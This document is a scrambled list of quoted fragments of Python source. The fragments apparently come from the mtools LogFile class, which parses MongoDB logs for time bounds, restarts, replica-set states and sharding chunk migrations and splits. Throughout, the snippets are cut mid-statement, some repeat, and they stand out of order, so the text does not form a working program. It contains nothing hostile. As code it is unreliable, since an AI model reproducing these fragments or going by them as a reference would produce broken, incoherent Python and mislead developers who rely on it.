'mongos'", "le except StopIteration: return states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP',", "stdin input currently. \"\"\" if not self._start: self._calculate_bounds() return self._start", "(?P<errmsg>\\S+):', prev_line) steps = None if match: errmsg = match.group('errmsg')", "(?P<numSplits>\\d+)', line) if match: time = logevent.datetime split_range = None", "= re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line)", "= self.next() if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return", "100: step_size = ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le =", "definitively that wiredTiger is being used \"\"\" if \"[initandlisten] wiredtiger_open", "time = logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') #", "max_start_lines: break # sanity check before attempting to find end", "info from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos", "at most 10k, # go back 30k at most to", "prev_line) steps = None if match: errmsg = match.group('errmsg') else:", "if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self): \"\"\"Lazy", "pos = 4 else: pos = 5 host = tokens[pos]", "= None self._timezone = None self._hostname = None self._port =", "at most to make sure we catch one) self.filehandle.seek(0, 2)", "ln = 0 for ln, line in enumerate(self.filehandle): if isinstance(line,", "__iter__(self): \"\"\" Iterate over LogFile object. Return a LogEvent object", "\"mongos\": if \"Starting new replica set monitor for\" in line:", "detected trying to find previous \" \"log line near offset", "= \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) prev_line", "if self._bounds_calculated: # Assume no need to recalc bounds for", "and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level =", "logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\")", "errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent = LogEvent(line) match", "= re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match:", "new_config in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version:", "errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\" in line:", "if not self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily", "logevent.line_str): self._binary = 'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)',", "pos = 5 host = tokens[pos] rs_state = tokens[-1] state", "raise SystemExit(\"Cannot parse %s with requested options\" % self.filehandle.name) else:", "re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers'))", "return self._port @property def versions(self): \"\"\"Return all version changes.\"\"\" versions", "= \"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace, steps, note,", "match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"jumbo\"", "StopIteration line = line.rstrip('\\n') le = LogEvent(line) # hint format", "in line: logevent = LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \"", "wrapper class. Handles open file streams or stdin.\"\"\" def __init__(self,", "Lazy evaluation of start and end of logfile. Returns None", "None elif le.datetime: # gather new hint info from another", "match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine =", "= LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if", "a truly smaller line while self.filehandle.tell() >= 2 and (le.datetime", "line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\": if \"Starting new replica", "@property def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\" if not", "of logfile.\"\"\" if self._bounds_calculated: # Assume no need to recalc", "check before attempting to find end date if (self._start is", "in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos,", "self._num_lines @property def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if", "end of logfile. Returns None for stdin input currently. \"\"\"", "helper function. Find the current (or previous if prev=True) line", "\"moveChunk.from\" in line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*'", "is None or le.datetime >= start_dt): self.filehandle.seek(-2, 1) le =", "def _iterate_lines(self): \"\"\"Count number of lines (can be expensive).\"\"\" self._num_lines", "skip lines until start_dt is reached return else: # fast", "back 30k at most to make sure we catch one)", "namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector", "= None self._restarts = None self._binary = None self._timezone =", "self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr = \"-\" * 60", "chunk\" in line: logevent = LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\)", "match.group('namespace') # TODO: alter this to find moved from shard", "year rollover and hint datetime format.\"\"\" # use readline here", "def shards(self): \"\"\"Lazily return the shards (if available)\"\"\" if not", "le.datetime >= start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0) #", "in line: tokens = line.split() # 2.6 if tokens[1].endswith(']'): pos", "including potential year rollovers self._calculate_bounds() @property def start(self): \"\"\" Lazy", "if not self._num_lines: self._iterate_lines() return self._port @property def versions(self): \"\"\"Return", "line: match = re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set =", "in self.states: rs_state = tokens[-1] else: # 2.6 if tokens[1].endswith(']'):", "line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart,", "by :: (?P<errmsg>\\S+):', prev_line) steps = None if match: errmsg", "self._restarts.append((restart, logevent)) if \"starting :\" in line or \"starting:\" in", "'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version:", "le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate over LogFile object.", "characters (at most) and find last newline char jump_back =", "rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines = ln + 1 #", "set config in use: \") if new_config in line: match", "if line == '': raise StopIteration line = line.rstrip('\\n') le", "self.next() return logevent except StopIteration: # reached end of file", "if not self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self): \"\"\"Get next", "shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\": logevent", "if not self.end and self.from_stdin: if le and le.datetime: self._end", "errmsg = match.group('errmsg') chunk_migration = (time, chunk_range, moved_from, namespace, steps,", "self._calculate_bounds() return self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation of the", "self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"Unable to", "\"is now in state\" in line: tokens = line.split() #", "self._end = le.datetime # future iterations start from the beginning", "> max_start_lines: break # sanity check before attempting to find", "only two engines, MMAPv1 and WiredTiger \"\"\" if \"[initandlisten] options:\"", "in a log file based on the current seek position.", "def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if available).\"\"\" if not", "return False def _calculate_bounds(self): \"\"\"Calculate beginning and end of logfile.\"\"\"", "self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward file to given start_dt", "hint format and nextpos from previous line if self._datetime_format and", "line while self.filehandle.tell() >= 2 and (le.datetime is None or", "if \"is now in state\" in line: tokens = line.split()", "self._num_lines = None self._restarts = None self._binary = None self._timezone", "char if newline_pos == -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos -", "name.\"\"\" if not self._num_lines: self._iterate_lines() return self._port @property def versions(self):", "= None self._storage_engine = None self._datetime_format = None self._year_rollover =", "any sharding related information \"\"\" self._shards = [] self._chunks_moved_from =", "= match.group(\"namespace\") numSplits = 0 success = False time_taken =", "== 'mongosMain' and ('MongoS' in logevent.line_str or 'mongos' in logevent.line_str):", "Only fast for files. Streams need to be forwarded manually,", "Streams need to be forwarded manually, and it will miss", "in state\" in line: tokens = line.split() # 2.6 if", "\"starting:\" in line: # look for hostname, port match =", "in line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])',", "= (time, chunk_range, moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if", "end of logfile.\"\"\" if self._bounds_calculated: # Assume no need to", "\"\"\" if not self._end: self._calculate_bounds() return self._end @property def timezone(self):", "(?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs", "= 0 error = \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success,", "'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime", "logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format", "is not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not", "moved from shard name when SERVER-45770 TICKET is added moved_from", "if note == \"success\": errmsg = None steps = re.findall('(?P<steps>step", "match: time = logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\")", "None self._hostname = None self._port = None self._rs_state = None", "else: return False def _calculate_bounds(self): \"\"\"Calculate beginning and end of", "\"\"\" if self.from_stdin: return None if not self._num_lines: self._iterate_lines() return", "= max_mark # check if start_dt is already smaller than", "self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])', line) if", "self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated = False self._start =", "_calculate_bounds(self): \"\"\"Calculate beginning and end of logfile.\"\"\" if self._bounds_calculated: #", "not self._num_lines: self._iterate_lines() return self._rs_state @property def binary(self): \"\"\"Lazy evaluation", "jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos,", "stdin input currently. \"\"\" if self.from_stdin: return None if not", "@property def has_level(self): \"\"\"Lazy evaluation of the whether the logfile", "was a roll-over, subtract 1 year from start time if", "line) if match: self._repl_set = match.group('replSet') self._repl_set_version = match.group('replSetVersion') match", "# roll forward until we found a line with a", "(self)' if tokens[-1] in self.states: rs_state = tokens[-1] else: #", "# Track previous file position for loop detection in _find_curr_line()", "= 0 success = True error = None self._chunk_splits.append((time, split_range,", "trying to find previous \" \"log line near offset %s", "logevent = self.next() return logevent except StopIteration: # reached end", "= re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'),", "in line: self._storage_engine = 'wiredTiger' if \"command admin.$cmd command: {", "None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret: #", "in line or \"starting:\" in line: # look for hostname,", "logevent.line_str) if version: version = version.group(1) return version else: return", "lines) if \"version\" in line[:100]: logevent = LogEvent(line) restart =", "Assume no need to recalc bounds for lifetime of a", "= min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0)", "if not self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\"", "not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\"", "/ 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not le:", "'numSplits: (?P<numSplits>\\d+)', line) if match: time = logevent.datetime split_range =", "import LogEvent class LogFile(InputSource): \"\"\"Log file wrapper class. Handles open", "check if start_dt is already smaller than first datetime self.filehandle.seek(0)", "Track previous file position for loop detection in _find_curr_line() self.prev_pos", "# sanity check before attempting to find end date if", "self._end else: self._year_rollover = False # reset logfile self.filehandle.seek(0) self._bounds_calculated", "match.group('errmsg') chunk_migration = (time, chunk_range, moved_from, namespace, steps, note, errmsg)", "if \"moveChunk.from\" in line: logevent = LogEvent(line) match = re.search('ns:", "self._year_rollover = None self._shards = None self._csrs = None self._chunks_moved_from", "if \"Starting new replica set monitor for\" in line: if", "step_size = max_mark # check if start_dt is already smaller", "while True: try: le = self.next() except StopIteration as e:", "' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set = match.group('replSet')", "if tokens[-1] in self.states: rs_state = tokens[-1] else: # 2.6", "self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy evaluation of all", "binary(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines:", "self._bounds_calculated = True return True def _find_curr_line(self, prev=False): \"\"\" Internal", "StopIteration exception) per PEP 479 return # get start date", "0 for ln, line in enumerate(self.filehandle): if isinstance(line, bytes): line", "year from start time if self._end < self._start: self._start =", "= match.group('movedTo') note = match.group('note') if note == \"success\": errmsg", "of lines (can be expensive).\"\"\" self._num_lines = 0 self._restarts =", "self.from_stdin: return False # we should be able to find", "logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line)", "use: \") if new_config in line: match = re.search('{ _id:", "error_context = 300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr =", "return None def _find_sharding_info(self): \"\"\" Iterate over file and find", "changes.\"\"\" versions = [] for v, _ in self.restarts: if", "TODO: alter this to find moved from shard name when", "line.decode('utf-8', 'replace') if line == '': raise StopIteration line =", "= (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else: match = re.search(\"for", "not self._num_lines: self._iterate_lines() return self._storage_engine @property def shards(self): \"\"\"Lazily return", "version = version.group(1) return version else: return False def _calculate_bounds(self):", "For 3.0 the \"[initandlisten] options:\" long entry contained the \"engine\"", "of \\d): (?P<stepTimes>\\d+)', line) else: steps = None match =", "not self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self): \"\"\"Return the", "time_taken, error)) prev_line = line # reset logfile self.filehandle.seek(0) def", "match: self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])', line)", "lines. Returns None for stdin input currently. \"\"\" if self.from_stdin:", "\"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg') chunk_migration = (time,", "of the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary", "previous \" \"log line near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<---", "30k at most to make sure we catch one) self.filehandle.seek(0,", "= True return True def _find_curr_line(self, prev=False): \"\"\" Internal helper", "def versions(self): \"\"\"Return all version changes.\"\"\" versions = [] for", "and line[31:39].strip() in LogEvent.log_components): self._has_level = True # find version", "= \"\" for line in self.filehandle: if isinstance(line, bytes): line", "\"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine') else: self._storage_engine =", "timezone(self): \"\"\"Lazy evaluation of timezone of logfile.\"\"\" if not self._timezone:", "of start and end of logfile. Returns None for stdin", "and le.datetime: self._start = le.datetime try: yield le except StopIteration:", "from previous line if self._datetime_format and self._datetime_nextpos is not None:", "(?P<time_taken>\\d+)', line) if match: time = logevent.datetime split_range = match.group(\"range\")", "until we found a line with a datetime try: logevent", "self._port = match.group('port') \"\"\" For 3.0 the \"[initandlisten] options:\" long", "# end of log file, get end date if not", "the \"[initandlisten] options:\" no longer contains the \"engine\" field So", "\"Unknown\" note = match.group('note') if note == \"success\": errmsg =", "if match: errmsg = match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration", "logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos", "line) if match: self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+", "and self.prev_pos is not None and self.prev_pos == curr_pos: #", "\"db version v\" in logevent.line_str): self._binary = 'mongod' elif logevent.thread", "_id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._csrs =", "\"[initandlisten] options:\" in line: match = re.search('replSet: \"(?P<replSet>\\S+)\"', line) if", "replSet protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol", "= le.datetime try: yield le except StopIteration: return states =", "error)) elif \"splitVector\" in line: logevent = LogEvent(line) match =", "match = re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members =", "(match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\": logevent = LogEvent(line)", "namespace = match.group(\"namespace\") numSplits = match.group('numSplits') success = None time_taken", "self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\" if", "'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return", "not self._num_lines: self._iterate_lines() return self._binary @property def hostname(self): \"\"\"Lazy evaluation", "self._datetime_format and self._datetime_nextpos is not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos,", "line: # look for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line)", "reset logfile self.filehandle.seek(0) self._bounds_calculated = True return True def _find_curr_line(self,", "match: self._repl_set_members = match.group('replSetMembers') # if (\"is now in state\"", "of lines. Returns None for stdin input currently. \"\"\" if", "return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily return the chunks moved", "version changes.\"\"\" versions = [] for v, _ in self.restarts:", "file to given start_dt datetime obj using binary search. Only", "return self._rs_state @property def binary(self): \"\"\"Lazy evaluation of the binary", "self._find_sharding_info() return self._chunk_splits def next(self): \"\"\"Get next line, adjust for", "# search for lower bound while abs(step_size) > 100: step_size", "# reached end of file return None def _find_sharding_info(self): \"\"\"", "self._timezone = None self._hostname = None self._port = None self._rs_state", "stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile as open file stream", "date for stdin input if not self.start and self.from_stdin: if", "os.path.basename(self.name) host += ' (self)' if tokens[-1] in self.states: rs_state", "buff[:newline_pos].rfind('\\n') # move back to last newline char if newline_pos", ">= start_dt: step_size = -abs(step_size) else: step_size = abs(step_size) if", "be forwarded manually, and it will miss the first line", "= self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev and self.prev_pos is not", "but would now tell us definitively that wiredTiger is being", "= ( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in line: logevent", "start datetime for line in self.filehandle: logevent = LogEvent(line) lines_checked", "line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end =", "so seek position is wrong line = self.filehandle.readline() if isinstance(line,", "\"\"\"Lazily return the shards (if available)\"\"\" if not self._shards: self._find_sharding_info()", "be expensive).\"\"\" self._num_lines = 0 self._restarts = [] self._rs_state =", "' '.join(tokens[pos:]) state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines", "numSplits, success, time_taken, error)) elif \"splitVector\" in line: logevent =", "in 3.0, but would now tell us definitively that wiredTiger", "readline here because next() iterator uses internal readahead # buffer", "(?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime", "def _find_curr_line(self, prev=False): \"\"\" Internal helper function. Find the current", "search. Only fast for files. Streams need to be forwarded", "line) if match: time = logevent.datetime split_range = match.group(\"range\") namespace", "'in namespace (?P<namespace>\\S+)' ' :: caused by :: (?P<error>\\S+): ',", "(current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context],", "from math import ceil from mtools.util.input_source import InputSource from mtools.util.logevent", "= re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol =", "shard (if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property", "return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return the chunks split", "LogEvent(line)) self._rs_state.append(state) continue self._num_lines = ln + 1 # reset", "(or previous if prev=True) line in a log file based", "self._binary @property def hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\"", "@property def port(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if", "(time, chunk_range, moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding", "self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return the chunks", "if available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine @property def", "= re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version = version.group(1) return version", "for line in self.filehandle: logevent = LogEvent(line) lines_checked += 1", "logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note:", "2 and (le.datetime is None or le.datetime >= start_dt): self.filehandle.seek(-2,", "return states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK',", "raise StopIteration line = line.rstrip('\\n') le = LogEvent(line) # hint", "LogEvent object for each line (generator). \"\"\" le = None", "sys from datetime import datetime from math import ceil from", "return self._storage_engine @property def shards(self): \"\"\"Lazily return the shards (if", "another logevent self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le", "= match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif", "self._storage_engine = None self._datetime_format = None self._year_rollover = None self._shards", "1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev and self.prev_pos", "monitor for\" in line: if \"[mongosMain]\" in line: match =", "line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])',", "per PEP 479 return # get start date for stdin", "False # reset logfile self.filehandle.seek(0) self._bounds_calculated = True return True", "evaluation of the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return", "Returns None for stdin input currently. \"\"\" if not self._start:", "timestamp format has changed, # invalidate hint info self._datetime_format =", "self._bounds_calculated = False self._start = None self._end = None self._filesize", "= None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif", "= line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\": if \"Starting new", "= True # find version string (fast check to eliminate", "self._num_lines: self._iterate_lines() return self._rs_state @property def binary(self): \"\"\"Lazy evaluation of", "\"\"\"Return the number of lines in a log file.\"\"\" return", "last newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff", "logevent.datetime break # if there was a roll-over, subtract 1", "InputSource from mtools.util.logevent import LogEvent class LogFile(InputSource): \"\"\"Log file wrapper", "match.group('note') if note == \"success\": errmsg = None steps =", "re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line) if match:", "(?P<stepTimes>\\d+)', line) else: steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"',", "files. Streams need to be forwarded manually, and it will", "eliminate most lines) if \"version\" in line[:100]: logevent = LogEvent(line)", "added moved_from = \"Unknown\" note = match.group('note') if note ==", "tokens = line.split() # 2.6 if tokens[1].endswith(']'): pos = 4", "300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr = \"-\" *", "states if line.endswith(state))): if \"is now in state\" in line:", "go back 30k at most to make sure we catch", "= self.filehandle.tell() # jump back 15k characters (at most) and", "( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in line: logevent =", "time = logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') moved_to", "WiredTiger \"\"\" if \"[initandlisten] options:\" in line: match = re.search('replSet:", "@property def chunks_moved_from(self): \"\"\"Lazily return the chunks moved from this", "enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if (self._has_level", "end datetime (lines are at most 10k, # go back", "self.next() self.filehandle.seek(newline_pos - jump_back + 1, 1) # roll forward", "\"replace\") newline_pos = buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n') #", "@property def start(self): \"\"\" Lazy evaluation of start and end", "= logevent.datetime break # if there was a roll-over, subtract", "we catch one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000),", "if match: self._storage_engine = match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\"", "= None self._chunks_moved_from = None self._chunks_moved_to = None self._chunk_splits =", "in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+),", "\"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line) if match: self._repl_set =", "'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range", "= buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back", "])', line) if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers') )", "= 0 self._restarts = [] self._rs_state = [] ln =", "self.filehandle.seek(0) return le = None self.filehandle.seek(0) # search for lower", "not self.from_stdin: self.filehandle.seek(0) # return (instead of raising StopIteration exception)", "self.prev_pos is not None and self.prev_pos == curr_pos: # Number", "if le.datetime >= start_dt: step_size = -abs(step_size) else: step_size =", "re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs and match.group('replSet')", "lifetime of a Logfile object return if self.from_stdin: return False", "of the whether the logfile has any level lines.\"\"\" if", "@property def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if not", "file wrapper class. Handles open file streams or stdin.\"\"\" def", "if not self._start: self._calculate_bounds() return self._start @property def end(self): \"\"\"", "split_range = None namespace = match.group(\"namespace\") numSplits = match.group('numSplits') success", "version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version = version.group(1) return", "self.num_lines def _iterate_lines(self): \"\"\"Count number of lines (can be expensive).\"\"\"", "self.filehandle.name) # get end datetime (lines are at most 10k,", "end of log file, get end date if not self.end", "#!/usr/bin/env python3 from __future__ import print_function import os import re", "\"\"\" curr_pos = self.filehandle.tell() # jump back 15k characters (at", "\"\"\" if self.from_stdin: return None if not self._filesize: self._calculate_bounds() return", "match.group('replSetMembers') ) if \"moveChunk.from\" in line: logevent = LogEvent(line) match", "return False # we should be able to find a", "buff = buff.decode(\"utf-8\", \"replace\") newline_pos = buff.rfind('\\n') if prev: newline_pos", "not self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self): \"\"\"Get next line,", "self._iterate_lines() return self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation of the", "otherwise match (as it consumes the log line). \"\"\" if", "'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._csrs = ( match.group('replSet'),", "if tokens[1].endswith(']'): pos = 4 else: pos = 5 host", "bytes): line = line.decode(\"utf-8\", \"replace\") if (self._has_level is None and", "def repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines:", "\"\"\"Count number of lines (can be expensive).\"\"\" self._num_lines = 0", "start from the beginning if not self.from_stdin: self.filehandle.seek(0) # return", "= LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to:", "valid log line within max_start_lines max_start_lines = 10 lines_checked =", "if self.from_stdin: return False # we should be able to", "indicates timestamp format has changed, # invalidate hint info self._datetime_format", "logevent): if (logevent.thread == 'initandlisten' and \"db version v\" in", "WiredTiger was the storage engine. There were only two engines,", "= buff[:newline_pos].rfind('\\n') # move back to last newline char if", "caused by :: (?P<errmsg>\\S+):', prev_line) steps = None if match:", "if le and le.datetime: self._end = le.datetime # future iterations", "this shard (if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to", "buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s", "else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version", "self._restarts = [] self._rs_state = [] ln = 0 for", "line: tokens = line.split() # 2.6 if tokens[1].endswith(']'): pos =", "= None # Track previous file position for loop detection", "line) if match: self._storage_engine = match.group('engine') else: self._storage_engine = 'mmapv1'", "break # if there was a roll-over, subtract 1 year", "= self._start.replace(year=self._start.year - 1) self._year_rollover = self._end else: self._year_rollover =", "== 0 or v != versions[-1]: versions.append(v) return versions @property", "\"-\" * 60 print(\"Fatal log parsing loop detected trying to", ") if \"moveChunk.from\" in line: logevent = LogEvent(line) match =", "file streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile as", "be able to find a valid log line within max_start_lines", "match: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"Starting new", "else: self._storage_engine = 'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\"", "previous line if self._datetime_format and self._datetime_nextpos is not None: ret", "= match.group('replSetMembers') # if (\"is now in state\" in line", "self._start = le.datetime try: yield le except StopIteration: return states", "= 0 # get start datetime for line in self.filehandle:", "( match.group('replSet'), match.group('replSetMembers') ) if \"Starting new replica set monitor", "fast bisection path max_mark = self.filesize step_size = max_mark #", "end date if not self.end and self.from_stdin: if le and", "we have to look for the \"[initandlisten] wiredtiger_open config:\" which", "' (self)' if tokens[-1] in self.states: rs_state = tokens[-1] else:", "reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten'", "lines_checked = 0 # get start datetime for line in", "replSetInitiate:\" in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members:", "self.filehandle.name) else: self.prev_pos = curr_pos if isinstance(buff, bytes): buff =", "line = line.rstrip('\\n') le = LogEvent(line) # hint format and", "line) if match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') #", "for the \"[initandlisten] wiredtiger_open config:\" which was present in 3.0,", "self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return the chunks", 